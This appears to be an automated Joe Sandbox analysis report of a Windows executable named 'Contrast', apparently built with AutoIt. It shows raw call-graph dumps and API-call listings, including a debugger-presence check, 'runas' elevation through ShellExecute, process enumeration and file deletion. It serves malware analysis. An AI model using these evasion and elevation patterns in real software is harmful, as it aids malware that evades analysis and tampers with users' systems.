99766->99975 99771 55f901 99788 511319 99787->99788 99792 511338 _memmove 99787->99792 99790 530fe6 Mailbox 59 API calls 99788->99790 99789 530fe6 Mailbox 59 API calls 99791 51134f 99789->99791 99790->99792 99791->99752 99792->99789 99793->99745 99978 524b29 99794->99978 99799 5608bb 99802 524a2f 84 API calls 99799->99802 99800 5249ed LoadLibraryExW 99988 524ade 99800->99988 99804 5608c2 99802->99804 99806 524ade 3 API calls 99804->99806 99809 5608ca 99806->99809 99807 524a14 99808 524a20 99807->99808 99807->99809 99811 524a2f 84 API calls 99808->99811 100014 524ab2 99809->100014 99813 5227af 99811->99813 99813->99756 99813->99757 99815 5608f1 100022 524a6e 99815->100022 99819 55fd14 99818->99819 99820 5229e7 99818->99820 100395 56ff5c 89 API calls 4 library calls 99819->100395 100379 523df7 60 API calls Mailbox 99820->100379 99912 524a8c 85 API calls 99911->99912 99913 579b85 99912->99913 100404 579cf1 99913->100404 99975->99771 100027 524b77 99978->100027 99981 524b50 99983 524b60 FreeLibrary 99981->99983 99984 5249d4 99981->99984 99982 524b77 2 API calls 99982->99981 99983->99984 99985 53547b 99984->99985 100031 535490 99985->100031 99987 5249e1 99987->99799 99987->99800 100112 524baa 99988->100112 99991 524b03 99993 524b15 FreeLibrary 99991->99993 99994 524a05 99991->99994 99992 524baa 2 API calls 99992->99991 99993->99994 99995 5248b0 99994->99995 99996 530fe6 Mailbox 59 API calls 99995->99996 99997 5248c5 99996->99997 99998 52433f 59 API calls 99997->99998 99999 5248d1 _memmove 99998->99999 100000 56080a 99999->100000 100001 52490c 99999->100001 100003 560817 100000->100003 100121 579ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100000->100121 100002 524a6e 69 API calls 100001->100002 100004 524915 100002->100004 100122 579f5e 95 API calls 100003->100122 100007 524ab2 74 API calls 100004->100007 100010 560859 100004->100010 100011 524a8c 85 API calls 100004->100011 100013 5249a0 100004->100013 100007->100004 100116 524a8c 100010->100116 100011->100004 100013->99807 100015 560945 100014->100015 100016 524ac4 100014->100016 100228 535802 100016->100228 100019 5796c4 100353 57951a 100019->100353 100021 5796da 100021->99815 100023 560908 100022->100023 100024 524a7d 100022->100024 100358 535e80 100024->100358 100028 524b44 100027->100028 100029 524b80 LoadLibraryA 100027->100029 100028->99981 100028->99982 100029->100028 100030 524b91 GetProcAddress 100029->100030 100030->100028 100033 53549c __alloc_osfhnd 100031->100033 100032 5354af 100080 538d58 58 API calls __getptd_noexit 100032->100080 100033->100032 100035 5354e0 100033->100035 100050 540718 100035->100050 100036 5354b4 100081 538fe6 9 API calls __woutput_l 100036->100081 100039 5354e5 100040 5354fb 100039->100040 100041 5354ee 100039->100041 100043 535525 100040->100043 100044 535505 100040->100044 100082 538d58 58 API calls __getptd_noexit 100041->100082 100065 540837 100043->100065 100083 538d58 58 API calls __getptd_noexit 100044->100083 100048 5354bf __alloc_osfhnd @_EH4_CallFilterFunc@8 100048->99987 100051 540724 __alloc_osfhnd 100050->100051 100052 539e3b __lock 58 API calls 100051->100052 100063 540732 100052->100063 100053 5407a6 100085 54082e 100053->100085 100054 5407ad 100090 538a4d 58 API calls 2 library calls 100054->100090 100057 540823 __alloc_osfhnd 100057->100039 100058 5407b4 100058->100053 100091 53a05b InitializeCriticalSectionAndSpinCount 100058->100091 100061 539ec3 __mtinitlocknum 58 API calls 100061->100063 100062 5407da EnterCriticalSection 100062->100053 100063->100053 100063->100054 100063->100061 100088 536e7d 59 API calls __lock 100063->100088 100089 536ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100063->100089 100074 540857 __wopenfile 100065->100074 100066 540871 100096 538d58 58 API calls __getptd_noexit 100066->100096 100068 540a2c 100068->100066 100072 540a8f 100068->100072 100069 540876 100097 538fe6 9 API calls __woutput_l 100069->100097 100071 535530 100084 535552 LeaveCriticalSection LeaveCriticalSection _fseek 100071->100084 100093 5487d1 100072->100093 100074->100066 100074->100068 100074->100074 100098 5339fb 60 API calls 2 library calls 100074->100098 100076 540a25 100076->100068 100099 5339fb 60 API calls 2 library calls 100076->100099 100078 540a44 100078->100068 100100 5339fb 60 API calls 2 library calls 100078->100100 100080->100036 100081->100048 100082->100048 100083->100048 100084->100048 100092 539fa5 LeaveCriticalSection 100085->100092 100087 540835 100087->100057 100088->100063 100089->100063 100090->100058 100091->100062 100092->100087 100101 547fb5 100093->100101 100095 5487ea 100095->100071 100096->100069 100097->100071 100098->100076 100099->100078 100100->100068 100102 547fc1 __alloc_osfhnd 100101->100102 100103 547fd7 100102->100103 100106 54800d 100102->100106 100104 538d58 __woutput_l 58 API calls 100103->100104 100105 547fdc 100104->100105 100107 538fe6 __woutput_l 9 API calls 100105->100107 100108 54807e __wsopen_nolock 109 API calls 100106->100108 100111 547fe6 __alloc_osfhnd 100107->100111 100109 548029 100108->100109 100110 548052 __wsopen_helper LeaveCriticalSection 100109->100110 100110->100111 100111->100095 100113 524af7 100112->100113 100114 524bb3 LoadLibraryA 100112->100114 100113->99991 100113->99992 100114->100113 100115 524bc4 GetProcAddress 100114->100115 100115->100113 100117 560923 100116->100117 100118 524a9b 100116->100118 100123 535a6d 100118->100123 100120 524aa9 100121->100003 100122->100004 100124 535a79 __alloc_osfhnd 100123->100124 100125 535a8b 100124->100125 100127 535ab1 100124->100127 100154 538d58 58 API calls __getptd_noexit 100125->100154 100136 536e3e 100127->100136 100129 535a90 100155 538fe6 9 API calls __woutput_l 100129->100155 100135 535a9b __alloc_osfhnd 100135->100120 100137 536e70 EnterCriticalSection 100136->100137 100138 536e4e 100136->100138 100140 535ab7 100137->100140 100138->100137 100139 536e56 100138->100139 100141 539e3b __lock 58 API calls 100139->100141 100142 5359de 100140->100142 100141->100140 100143 5359fc 100142->100143 100144 5359ec 100142->100144 100147 535a12 100143->100147 100157 535af0 100143->100157 100227 538d58 58 API calls __getptd_noexit 100144->100227 100154->100129 100155->100135 100231 53581d 100228->100231 100230 524ad5 100230->100019 100233 535829 __alloc_osfhnd 100231->100233 100232 535864 __alloc_osfhnd 100232->100230 100233->100232 100234 53583f _memset 100233->100234 100235 53586c 100233->100235 100258 538d58 58 API calls __getptd_noexit 100234->100258 100236 536e3e __lock_file 59 API calls 100235->100236 100238 535872 100236->100238 100244 53563d 100238->100244 100239 535859 100259 538fe6 9 API calls __woutput_l 100239->100259 100246 535658 _memset 100244->100246 100250 535673 100244->100250 100245 535663 100349 538d58 58 API calls __getptd_noexit 100245->100349 100246->100245 100246->100250 100255 5356b3 100246->100255 100248 535668 100350 538fe6 9 API calls __woutput_l 100248->100350 100260 5358a6 LeaveCriticalSection LeaveCriticalSection _fseek 100250->100260 100252 5357c4 _memset 100352 538d58 58 API calls __getptd_noexit 100252->100352 100253 534906 __filbuf 58 API calls 100253->100255 100255->100250 100255->100252 100255->100253 100261 54108b 100255->100261 100329 540dd7 100255->100329 100351 540ef8 58 API calls 3 library calls 100255->100351 100258->100239 100259->100232 100260->100232 100262 5410c3 100261->100262 100263 5410ac 100261->100263 100265 5417fb 100262->100265 100268 5410fd 100262->100268 100264 538d24 __write_nolock 58 API calls 100263->100264 100267 5410b1 100264->100267 100266 538d24 __write_nolock 58 API calls 100265->100266 100269 541800 100266->100269 100270 538d58 __woutput_l 58 API calls 100267->100270 100271 541105 100268->100271 100278 54111c 100268->100278 100272 538d58 __woutput_l 58 API calls 100269->100272 100310 5410b8 100270->100310 100273 538d24 __write_nolock 58 API calls 100271->100273 100274 541111 100272->100274 100275 54110a 100273->100275 100276 538fe6 __woutput_l 9 API calls 100274->100276 100279 538d58 __woutput_l 58 API calls 100275->100279 100276->100310 100277 541131 100280 538d24 __write_nolock 58 API calls 100277->100280 100278->100277 100281 54114b 100278->100281 100282 541169 100278->100282 100278->100310 100279->100274 100280->100275 100281->100277 100284 541156 100281->100284 100283 538a4d __malloc_crt 58 API calls 100282->100283 100285 541179 100283->100285 100286 545e9b __write_nolock 58 API calls 100284->100286 100287 541181 100285->100287 100288 54119c 100285->100288 100289 54126a 100286->100289 100290 538d58 __woutput_l 58 API calls 100287->100290 100292 541af1 __lseeki64_nolock 60 API calls 100288->100292 100291 5412e3 ReadFile 100289->100291 100296 541280 GetConsoleMode 100289->100296 100293 541186 100290->100293 100294 541305 100291->100294 100295 5417c3 GetLastError 100291->100295 100292->100284 100294->100295 100300 541294 100296->100300 100301 5412e0 100296->100301 100300->100301 100301->100291 100310->100255 100330 540de2 100329->100330 100335 540df7 100329->100335 100331 538d58 __woutput_l 58 API calls 100330->100331 100333 540de7 100331->100333 100332 540df2 100332->100255 100334 538fe6 __woutput_l 9 API calls 100333->100334 100334->100332 100335->100332 100336 540e2c 100335->100336 100337 546214 __getbuf 58 API calls 100335->100337 100338 534906 __filbuf 58 API calls 100336->100338 100337->100336 100339 540e40 100338->100339 100340 540f77 __read 72 API calls 100339->100340 100341 540e47 100340->100341 100341->100332 100342 534906 __filbuf 58 API calls 100341->100342 100343 540e6a 100342->100343 100343->100332 100349->100248 100350->100250 100351->100255 100352->100248 100356 53542a GetSystemTimeAsFileTime 100353->100356 100355 579529 100355->100021 100357 535458 __aulldiv 100356->100357 100357->100355 100359 535e8c __alloc_osfhnd 100358->100359 100360 535eb3 100359->100360 100361 535e9e 100359->100361 100363 536e3e __lock_file 59 API calls 100360->100363 100371 538d58 58 API calls __getptd_noexit 100361->100371 100365 535eb9 100363->100365 100364 535ea3 100371->100364 100408 579d05 __tzset_nolock _wcscmp 100404->100408 100541 524d83 100542 524dba 100541->100542 100543 524e37 100542->100543 100544 524dd8 100542->100544 100582 524e35 100542->100582 100546 5609c2 100543->100546 100547 524e3d 100543->100547 100548 524de5 100544->100548 100549 524ead PostQuitMessage 100544->100549 100545 524e1a DefWindowProcW 100572 524e28 100545->100572 100596 51c460 10 API calls Mailbox 100546->100596 100551 524e42 100547->100551 100552 524e65 SetTimer RegisterWindowMessageW 100547->100552 100553 524df0 100548->100553 100554 560a35 100548->100554 100549->100572 100560 560965 100551->100560 100561 524e49 KillTimer 100551->100561 100555 524e8e CreatePopupMenu 100552->100555 100552->100572 100556 524eb7 100553->100556 100557 524df8 100553->100557 100599 572cce 97 API calls _memset 100554->100599 100555->100572 100586 525b29 100556->100586 100562 524e03 100557->100562 100563 560a1a 100557->100563 100559 5609e9 100597 51c483 274 API calls Mailbox 100559->100597 100567 56099e MoveWindow 100560->100567 100568 56096a 100560->100568 100569 525ac3 Shell_NotifyIconW 100561->100569 100570 524e9b 100562->100570 100571 524e0e 100562->100571 100563->100545 100598 568854 59 API calls Mailbox 100563->100598 100564 560a47 100564->100545 100564->100572 100567->100572 100573 56096e 100568->100573 100574 56098d SetFocus 100568->100574 100575 524e5c 100569->100575 100594 525bd7 107 API calls _memset 100570->100594 100571->100545 100583 525ac3 Shell_NotifyIconW 100571->100583 100573->100571 100577 560977 100573->100577 100574->100572 100593 5134e4 DeleteObject DestroyWindow Mailbox 100575->100593 100595 51c460 10 API calls Mailbox 100577->100595 100580 524eab 100580->100572 100582->100545 100584 560a0e 100583->100584 100585 5259d3 94 API calls 100584->100585 100585->100582 100587 525bc2 100586->100587 100588 525b40 _memset 100586->100588 100587->100572 100589 5256f8 87 API calls 100588->100589 100591 525b67 100589->100591 100590 525bab KillTimer SetTimer 100590->100587 100591->100590 100592 560d6e Shell_NotifyIconW 100591->100592 100592->100590 100593->100572 100594->100580 100595->100572 100596->100559 100597->100571 100598->100582 100599->100564 100600 511066 100605 51aaaa 100600->100605 100602 51106c 100603 532f70 __cinit 67 API calls 100602->100603 100604 511076 100603->100604 100606 51aacb 100605->100606 100638 5302eb 100606->100638 100610 51ab12 100611 521207 59 API calls 100610->100611 100612 51ab1c 100611->100612 100613 521207 59 API calls 100612->100613 100614 51ab26 100613->100614 100615 521207 59 API calls 100614->100615 100616 51ab30 100615->100616 100617 521207 59 API calls 100616->100617 100618 51ab6e 100617->100618 100619 521207 59 API calls 100618->100619 100620 51ac39 100619->100620 100648 530588 100620->100648 100624 51ac6b 100625 521207 59 API calls 100624->100625 100626 51ac75 100625->100626 100676 52fe2b 100626->100676 100628 51acbc 100629 51accc GetStdHandle 100628->100629 100630 51ad18 100629->100630 100631 552f39 100629->100631 100632 51ad20 OleInitialize 100630->100632 100631->100630 100633 552f42 100631->100633 100632->100602 100683 5770f3 64 API calls Mailbox 100633->100683 100635 552f49 100684 5777c2 CreateThread 100635->100684 100637 552f55 CloseHandle 100637->100632 100685 5303c4 100638->100685 100641 5303c4 59 API calls 100642 53032d 100641->100642 100643 521207 59 API calls 100642->100643 100644 530339 100643->100644 100645 521821 59 API calls 100644->100645 100646 51aad1 100645->100646 100647 5307bb 6 API calls 100646->100647 100647->100610 100649 521207 59 API calls 100648->100649 100650 530598 100649->100650 100651 521207 59 API calls 100650->100651 100652 5305a0 100651->100652 100692 5210c3 100652->100692 100655 5210c3 59 API calls 100656 5305b0 100655->100656 100657 521207 59 API calls 100656->100657 100658 5305bb 100657->100658 100659 530fe6 Mailbox 59 API calls 100658->100659 100660 51ac43 100659->100660 100661 52ff4c 100660->100661 100662 52ff5a 100661->100662 100663 521207 59 API calls 100662->100663 100664 52ff65 100663->100664 100665 521207 59 API calls 100664->100665 100666 52ff70 100665->100666 100667 521207 59 API calls 100666->100667 100668 52ff7b 100667->100668 100669 521207 59 API calls 100668->100669 100670 52ff86 100669->100670 100671 5210c3 59 API calls 100670->100671 100672 52ff91 100671->100672 100673 530fe6 Mailbox 59 API calls 100672->100673 100674 52ff98 RegisterWindowMessageW 100673->100674 100674->100624 100677 52fe3b 100676->100677 100678 56620c 100676->100678 100679 530fe6 Mailbox 59 API calls 100677->100679 100695 57a12a 59 API calls 100678->100695 100681 52fe43 100679->100681 100681->100628 100682 566217 100683->100635 100684->100637 100696 5777a8 65 API calls 100684->100696 100686 521207 59 API calls 100685->100686 100687 5303cf 100686->100687 100688 521207 59 API calls 100687->100688 100689 5303d7 100688->100689 100690 521207 59 API calls 100689->100690 100691 530323 100690->100691 100691->100641 100693 521207 59 API calls 100692->100693 100694 5210cb 100693->100694 100694->100655 100695->100682 100697 54e463 100709 51373a 100697->100709 100699 54e479 100700 54e48f 100699->100700 100701 54e4fa 100699->100701 100718 515376 60 API calls 100700->100718 100704 51b020 274 API calls 100701->100704 100703 54e4ee Mailbox 100708 54f046 Mailbox 100703->100708 100720 57a48d 89 API calls 4 library calls 100703->100720 100704->100703 100706 54e4ce 100706->100703 100719 57890a 59 API calls Mailbox 100706->100719 100710 513746 100709->100710 100711 513758 100709->100711 100712 51523c 59 API calls 100710->100712 100713 513787 100711->100713 100714 51375e 100711->100714 100717 513750 100712->100717 100716 51523c 59 API calls 100713->100716 100715 530fe6 Mailbox 59 API calls 100714->100715 100715->100717 100716->100717 100717->100699 100718->100706 100719->100703 100720->100708 100721 519a88 100724 5186e0 100721->100724 100725 5186fd 100724->100725 100726 550ff8 100725->100726 100728 550fad 100725->100728 100746 518724 100725->100746 100759 58aad0 274 API calls __cinit 100726->100759 100730 550fb5 100728->100730 100731 550fc2 100728->100731 100728->100746 100729 515278 59 API calls 100729->100746 100757 58b0e4 274 API calls 100730->100757 100749 51898d 100731->100749 100758 58b58c 274 API calls 3 library calls 100731->100758 100732 532f70 __cinit 67 API calls 100732->100746 100735 551289 100735->100735 100737 5511af 100761 58ae3b 89 API calls 100737->100761 100740 518a17 100741 5139be 68 API calls 100741->100746 100744 51523c 59 API calls 100744->100746 100746->100729 100746->100732 100746->100737 100746->100740 100746->100741 100746->100744 100747 513c30 68 API calls 100746->100747 100748 513f42 68 API calls 100746->100748 100746->100749 100750 5153b0 274 API calls 100746->100750 100751 521c9c 59 API calls 100746->100751 100753 513938 68 API calls 100746->100753 100754 51855e 274 API calls 100746->100754 100755 5184e2 89 API calls 100746->100755 100756 51835f 274 API calls 100746->100756 100760 5673ab 59 API calls 100746->100760 100747->100746 100748->100746 100749->100740 100762 57a48d 89 API calls 4 library calls 100749->100762 100750->100746 100751->100746 100753->100746 100754->100746 100755->100746 100756->100746 100757->100731 100758->100749 100759->100746 100760->100746 100761->100749 100762->100735 100763 519b8b 100764 5186e0 274 API calls 100763->100764 100765 519b99 100764->100765 100766 519a6c 100769 51829c 100766->100769 100768 519a78 100770 5182b4 100769->100770 100771 518308 100769->100771 100770->100771 100772 5153b0 274 API calls 100770->100772 100775 518331 100771->100775 100778 57a48d 89 API calls 4 library calls 100771->100778 100776 5182eb 100772->100776 100774 550ed8 100774->100774 100775->100768 100776->100775 100777 51523c 59 API calls 100776->100777 100777->100771 100778->100774 100779 5792c8 100780 5792d5 100779->100780 100783 5792db 100779->100783 100781 532f85 _free 58 API calls 100780->100781 100781->100783 100782 5792ec 100785 5792fe 100782->100785 100786 532f85 _free 58 API calls 100782->100786 100783->100782 100784 532f85 _free 58 API calls 100783->100784 100784->100782 100786->100785

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0052527E
                                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                          • Part of subcall function 0051BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                                                                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00560B2E
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00560B66
                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C6D10), ref: 00560BE9
                                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00560BF0
                                                                                                                                          • Part of subcall function 0052514C: GetSysColorBrush.USER32(0000000F), ref: 00525156
                                                                                                                                          • Part of subcall function 0052514C: LoadCursorW.USER32(00000000,00007F00), ref: 00525165
                                                                                                                                          • Part of subcall function 0052514C: LoadIconW.USER32(00000063), ref: 0052517C
                                                                                                                                          • Part of subcall function 0052514C: LoadIconW.USER32(000000A4), ref: 0052518E
                                                                                                                                          • Part of subcall function 0052514C: LoadIconW.USER32(000000A2), ref: 005251A0
                                                                                                                                          • Part of subcall function 0052514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005251C6
                                                                                                                                          • Part of subcall function 0052514C: RegisterClassExW.USER32(?), ref: 0052521C
                                                                                                                                          • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00525109
                                                                                                                                          • Part of subcall function 005250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0052512A
                                                                                                                                          • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 0052513E
                                                                                                                                          • Part of subcall function 005250DB: ShowWindow.USER32(00000000), ref: 00525147
                                                                                                                                          • Part of subcall function 005259D3: _memset.LIBCMT ref: 005259F9
                                                                                                                                          • Part of subcall function 005259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00525A9E
                                                                                                                                        Strings
                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00560B28
                                                                                                                                        • runas, xrefs: 00560BE4
                                                                                                                                        • AutoIt, xrefs: 00560B23
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                        • API String ID: 529118366-2030392706
                                                                                                                                        • Opcode ID: 413437563810c6b74863b5eee370a1ab2a2de6457e2d0386e2c09d3a1c71353e
                                                                                                                                        • Instruction ID: 1037bf8b2bc966fb061c743da6a132dd0e32f2d5d92b29bc22b9068d64528c63
                                                                                                                                        • Opcode Fuzzy Hash: 413437563810c6b74863b5eee370a1ab2a2de6457e2d0386e2c09d3a1c71353e
                                                                                                                                        • Instruction Fuzzy Hash: AA51053494469DAACB21EBB4EC09EFE7F78BFAA340F105467F451621E2EB700548DB21

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1083 525d13-525d73 call 521207 GetVersionExW call 521821 1088 525e78-525e7a 1083->1088 1089 525d79 1083->1089 1090 560fa9-560fb5 1088->1090 1091 525d7c-525d81 1089->1091 1094 560fb6-560fba 1090->1094 1092 525d87 1091->1092 1093 525e7f-525e80 1091->1093 1095 525d88-525dbf call 521981 call 52133d 1092->1095 1093->1095 1096 560fbc 1094->1096 1097 560fbd-560fc9 1094->1097 1106 525dc5-525dc6 1095->1106 1107 561098-56109b 1095->1107 1096->1097 1097->1094 1098 560fcb-560fd0 1097->1098 1098->1091 1100 560fd6-560fdd 1098->1100 1100->1090 1102 560fdf 1100->1102 1105 560fe4-560fea 1102->1105 1108 525e00-525e17 GetCurrentProcess IsWow64Process 1105->1108 1109 560fef-560ffa 1106->1109 1110 525dcc-525dcf 1106->1110 1111 5610b4-5610b8 1107->1111 1112 56109d 1107->1112 1117 525e19 1108->1117 1118 525e1c-525e2d 1108->1118 1113 561017-561019 1109->1113 1114 560ffc-561002 1109->1114 1110->1108 1115 525dd1-525def 1110->1115 1119 5610a3-5610ac 1111->1119 1120 5610ba-5610c3 1111->1120 1116 5610a0 1112->1116 1124 56103c-56103f 1113->1124 1125 56101b-561027 1113->1125 1121 561004-561007 1114->1121 1122 56100c-561012 1114->1122 1115->1108 1123 525df1-525df7 1115->1123 1116->1119 1117->1118 1127 525e98-525ea2 GetSystemInfo 1118->1127 1128 525e2f-525e3f call 5255f0 1118->1128 1119->1111 1120->1116 1126 5610c5-5610c8 1120->1126 1121->1108 1122->1108 1123->1105 1129 525dfd 1123->1129 1133 561065-561068 1124->1133 1134 561041-561050 1124->1134 1130 561031-561037 1125->1130 1131 561029-56102c 1125->1131 1126->1119 1132 525e65-525e75 1127->1132 1140 525e41-525e4e call 5255f0 1128->1140 1141 525e8c-525e96 GetSystemInfo 1128->1141 1129->1108 1130->1108 1131->1108 1133->1108 1139 56106e-561083 1133->1139 1136 561052-561055 1134->1136 1137 56105a-561060 1134->1137 1136->1108 1137->1108 1142 561085-561088 1139->1142 1143 56108d-561093 1139->1143 1148 525e50-525e54 GetNativeSystemInfo 1140->1148 1149 525e85-525e8a 1140->1149 1145 525e56-525e5a 1141->1145 1142->1108 1143->1108 1145->1132 1147 525e5c-525e5f FreeLibrary 1145->1147 1147->1132 1148->1145 1149->1148
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00525D40
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,005A0A18,00000000,00000000,?), ref: 00525E07
                                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00525E0E
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00525E54
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00525E5F
                                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00525E90
                                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00525E9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1986165174-0
                                                                                                                                        • Opcode ID: 5051955fc015672cb123b774c04939cc35bde65b42d4c8ad827c0874517ddf86
                                                                                                                                        • Instruction ID: fedfb6dd56ca0ba04498f48519009a505bd3183a409ec2b06a062d67ad3d17d3
                                                                                                                                        • Opcode Fuzzy Hash: 5051955fc015672cb123b774c04939cc35bde65b42d4c8ad827c0874517ddf86
                                                                                                                                        • Instruction Fuzzy Hash: AD91B331549BD0DECB31CB7894545ABFFE5BF3A300B884A9ED0C793A81E630A648D759

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1191 574005-57404c call 521207 * 3 call 530284 call 574fec 1202 57404e-574057 call 521900 1191->1202 1203 57405c-57408d call 530119 FindFirstFileW 1191->1203 1202->1203 1207 57408f-574091 1203->1207 1208 5740fc-574103 FindClose 1203->1208 1207->1208 1210 574093-574098 1207->1210 1209 574107-574129 call 521cb6 * 3 1208->1209 1212 5740d7-5740e9 FindNextFileW 1210->1212 1213 57409a-5740d5 call 521c9c call 5217e0 call 521900 DeleteFileW 1210->1213 1212->1207 1214 5740eb-5740f1 1212->1214 1213->1212 1226 5740f3-5740fa FindClose 1213->1226 1214->1207 1226->1209
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00530284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00522A58,?,00008000), ref: 005302A4
                                                                                                                                          • Part of subcall function 00574FEC: GetFileAttributesW.KERNEL32(?,00573BFE), ref: 00574FED
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0057407C
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 005740CC
                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 005740DD
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005740F4
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 005740FD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                        • Opcode ID: bdb7507eee4764c86c9be812502a5dc4251c5bfb2b9a1b8fff7ae2efffae8f2b
                                                                                                                                        • Instruction ID: fe4d8600fca1bce613fe3ca1d70b8b4ac9fbd46b8a17b3a0d4f0201600c19bcc
                                                                                                                                        • Opcode Fuzzy Hash: bdb7507eee4764c86c9be812502a5dc4251c5bfb2b9a1b8fff7ae2efffae8f2b
                                                                                                                                        • Instruction Fuzzy Hash: D53185350183569FC305EF60E8999AFBBE8BEA2304F444E1DF4D6921D1DB209A0DDB56
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0057416D
                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0057417B
                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0057419B
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00574245
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
